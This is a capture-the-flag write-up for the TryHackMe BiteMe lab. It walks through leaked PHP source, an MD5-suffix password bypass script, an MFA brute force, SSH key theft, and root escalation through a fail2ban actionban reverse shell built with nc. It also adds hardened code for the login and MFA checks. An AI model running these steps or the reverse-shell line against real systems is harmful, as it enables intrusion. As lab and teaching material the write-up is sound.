d3vyce 095a13b2c9
add: writeup-ctf
2024-03-02 21:49:07 +01:00


---
title: "Writeup - BiteMe (THM)"
date: 2022-03-21
slug: "writeup-biteme-thm"
type: "writeup-ctf"
---
This is a writeup for the [Biteme](https://tryhackme.com/room/biteme) machine from the TryHackMe site.
## Enumeration
First, let's start with a scan of our target with the following command:
```bash
nmap -sV 10.10.31.162
```
Two TCP ports are discovered:
![](img/image-1.webp)
- 22/tcp: SSH (OpenSSH 7.6p1)
- 80/tcp: HTTP web server (Apache 2.4.29)
## Exploit
First of all, I start with a scan of the website's pages.
![](img/image-2.webp)
Nothing special, let's try to do the same scan but with a focus on ".php" pages.
![](img/image-3.webp)
Ok, now a number of pages appear, including "dashboard.php", which gives us access to a login form.
![](img/image-4.webp)
The "config.php" page, which reveals a login identifier:
```php
<?php
define('LOGIN_USER', '6a61736f6e5f746573745f6163636f756e74');
```
The "function.php" page, which contains the functions that validate the login form's username and password:
```php
<?php
include('config.php');
function is_valid_user($user) {
    $user = bin2hex($user);
    return $user === LOGIN_USER;
}
// @fred let's talk about ways to make this more secure but still flexible
function is_valid_pwd($pwd) {
    $hash = md5($pwd);
    return substr($hash, -3) === '001';
}
```
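For contrast, here is a hardened version of these two checks. This is an added example, not code from the BiteMe room or from this writeup; the username and password values in it are constructed for illustration. The weak check accepts any input whose MD5 ends in the three hex digits `001`, which is 1 in 4096 arbitrary strings; the hardened version accepts only the one password that produced the stored hash and compares the username in constant time.

```php
<?php
// Added example (not from the BiteMe room): a hardened replacement for the
// is_valid_user / is_valid_pwd pair shown in function.php. Assumes the expected
// username and a password hash are stored server-side; values are constructed.

// Username kept as a plain string (decoded from the hex in config.php).
const EXPECTED_USER = 'jason_test_account';
// Password stored as a salted hash produced by password_hash() (bcrypt by default).
$storedHash = password_hash('example-only-password', PASSWORD_DEFAULT); // constructed

// Constant-time comparison of the submitted username against the expected one.
// hash_equals() avoids leaking how many leading bytes matched through timing.
function is_valid_user_hardened(string $user): bool {
    return hash_equals(EXPECTED_USER, $user);
}

// Verify the password against the stored hash: only the original password passes.
function is_valid_pwd_hardened(string $pwd, string $storedHash): bool {
    return password_verify($pwd, $storedHash);
}

// The weak check from function.php, kept here to measure its acceptance rate.
function is_valid_pwd_weak(string $pwd): bool {
    return substr(md5($pwd), -3) === '001';
}

// Count how many of $n arbitrary strings the weak check accepts as "the password".
function count_weak_accepts(int $n): int {
    $accepted = 0;
    for ($i = 0; $i < $n; $i++) {
        if (is_valid_pwd_weak("candidate-$i")) {
            $accepted++;
        }
    }
    return $accepted;
}

$n = 100000;
printf("weak check accepted %d of %d arbitrary strings (expected about %d)\n",
    count_weak_accepts($n), $n, intdiv($n, 4096));
var_dump(is_valid_pwd_hardened('example-only-password', $storedHash));
var_dump(is_valid_pwd_hardened('candidate-42', $storedHash));
var_dump(is_valid_user_hardened('jason_test_account'));
```

The point of `count_weak_accepts` is that the weak check does not need the real password at all: roughly one candidate in 4096 satisfies it, which is exactly what the rockyou script further down exploits. With `password_verify` there is no shortcut other than guessing the actual password, and the hash itself cannot be reversed to a shorter condition.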
Now that we have all this information, we can start working. First, with a hex decoder we find the nickname "jason\_test\_account".
Then, using the logic of `is_valid_pwd`, we can write the following script to find a password that satisfies the check:
```php
<?php
// Walk the wordlist and stop at the first entry whose MD5 ends in "001",
// since that is all is_valid_pwd() verifies.
$wordlist = fopen('wordlist/rockyou.txt', 'r');
while (($l = fgets($wordlist)) !== false) {
    $hash = md5(trim($l));
    if (substr($hash, -3) === '001') {
        echo $l;
        break;
    }
}
fclose($wordlist);
```
![](img/image-5.webp)
We can now log in, but it is not finished. The page now asks us for an MFA code. Intercepting the server's response, we find the following in the source code.
![](img/image-6.webp)
This tells us that it is possible to brute force the MFA code, as no anti-brute-force mechanism is in place. To carry out the brute force, I first generate a dictionary of all the possible codes with the following command:
```bash
crunch 4 4 0123456789 -o mfa
```
Then with Burp Intruder, I test all the possibilities!
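To show what stops this, here is how the MFA verification could be written server-side. This is an added example, not the room's code or the author's; it keeps its state in an in-memory array, which is an assumption made so the script runs on its own (a real deployment would use the session, a database or a cache). A per-user attempt budget and a lockout mean the 10,000-code space can no longer be exhausted one request at a time.

```php
<?php
// Added example (not the BiteMe room's code): MFA verification with a per-user
// attempt counter, lockout and code expiry. The store is an in-memory array here.

const MFA_MAX_ATTEMPTS = 5;      // wrong guesses allowed per issued code
const MFA_LOCKOUT_SECONDS = 300; // wait after the budget is exhausted
const MFA_CODE_LIFETIME = 120;   // seconds before a code expires

$mfaStore = []; // user => ['code', 'issued', 'attempts', 'locked_until']

// Issue a fresh 4-digit code from a CSPRNG (random_int), zero-padded.
function mfa_issue(array &$store, string $user, int $now): string {
    $code = str_pad((string) random_int(0, 9999), 4, '0', STR_PAD_LEFT);
    $store[$user] = ['code' => $code, 'issued' => $now, 'attempts' => 0,
                     'locked_until' => $store[$user]['locked_until'] ?? 0];
    return $code;
}

// Returns 'ok', 'locked', 'expired' or 'wrong'. A wrong guess increments the
// counter; exhausting the budget burns the code and locks the user.
function mfa_verify(array &$store, string $user, string $submitted, int $now): string {
    $entry = $store[$user] ?? null;
    if ($entry === null) {
        return 'wrong';
    }
    if ($now < $entry['locked_until']) {
        return 'locked';
    }
    if ($now - $entry['issued'] > MFA_CODE_LIFETIME) {
        unset($store[$user]);
        return 'expired';
    }
    // Constant-time comparison: no timing hint about which digits matched.
    if (hash_equals($entry['code'], $submitted)) {
        unset($store[$user]); // codes are single use
        return 'ok';
    }
    $store[$user]['attempts']++;
    if ($store[$user]['attempts'] >= MFA_MAX_ATTEMPTS) {
        // A brute forcer now gets MFA_MAX_ATTEMPTS guesses per lockout window
        // instead of 10,000 in a row, and the code they were guessing is gone.
        $store[$user]['code'] = '';
        $store[$user]['locked_until'] = $now + MFA_LOCKOUT_SECONDS;
    }
    return 'wrong';
}

// Simulate the Intruder-style approach: submit every code in order and tally
// how the server answered.
function simulate_bruteforce(array &$store, string $user, int $now): array {
    $results = [];
    for ($guess = 0; $guess < 10000; $guess++) {
        $r = mfa_verify($store, $user, sprintf('%04d', $guess), $now);
        $results[$r] = ($results[$r] ?? 0) + 1;
        if ($r === 'ok') {
            break;
        }
    }
    return $results;
}

$now = time();
mfa_issue($mfaStore, 'jason', $now); // would normally be delivered out of band
print_r(simulate_bruteforce($mfaStore, 'jason', $now));

// Legitimate flow once the lockout has passed: fresh code, correct on first try.
$code = mfa_issue($mfaStore, 'jason', $now + MFA_LOCKOUT_SECONDS + 1);
echo mfa_verify($mfaStore, 'jason', $code, $now + MFA_LOCKOUT_SECONDS + 2), "\n";
```

Unless the code happens to fall in the first five guesses, the simulation shows five `wrong` answers followed by `locked` for everything else, and the burned code would not be accepted even after the lockout expires; the legitimate user simply requests a new one. Logging the `locked` events also gives the defender a clear signal of the attempt.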
I now have access to a page that allows me to list the contents of a folder or read the contents of a file. So I want to get the id\_rsa of the user Jason to connect via SSH.
![](img/image-7.webp)
But we have a problem: the RSA key is encrypted with a passphrase. To find it, I use the following commands:
![](img/image-8.webp)
I can now connect via SSH as the user Jason and get the first flag.
```bash
chmod 600 id.jason
ssh -i id.jason jason@10.10.31.162
```
## Privilege escalation
For privilege escalation, I start by checking the permissions with the "sudo -l" command.
![](img/image-9.webp)
I observe that the user Fred has sudo permissions that do not require a password, so I switch to that user to find out more.
![](img/image-10.webp)
It turns out that this user can run the command "sudo /bin/systemctl restart fail2ban" without a password. This is interesting because the fail2ban configuration files let you define commands that are executed in certain situations (for example when an IP is banned). Since the fail2ban service runs with root rights, those commands are executed as root!
So I edit the "iptables-multiport.conf" file to add a command that gives me a reverse shell:
```bash
actionban = rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 10.18.67.218 1234 >/tmp/f
```
I then run the following command to restart fail2ban:
```bash
sudo systemctl restart fail2ban
```
I now have a root shell and I can get the last flag!
![](img/image-11.webp)
## Recommendations
To patch this host, I think the following actions would be necessary:
- Do not allow access to .phps pages
- Use a real password verification function
- Implement an anti-brute force function for the MFA page
- Don't let sudo be used without a password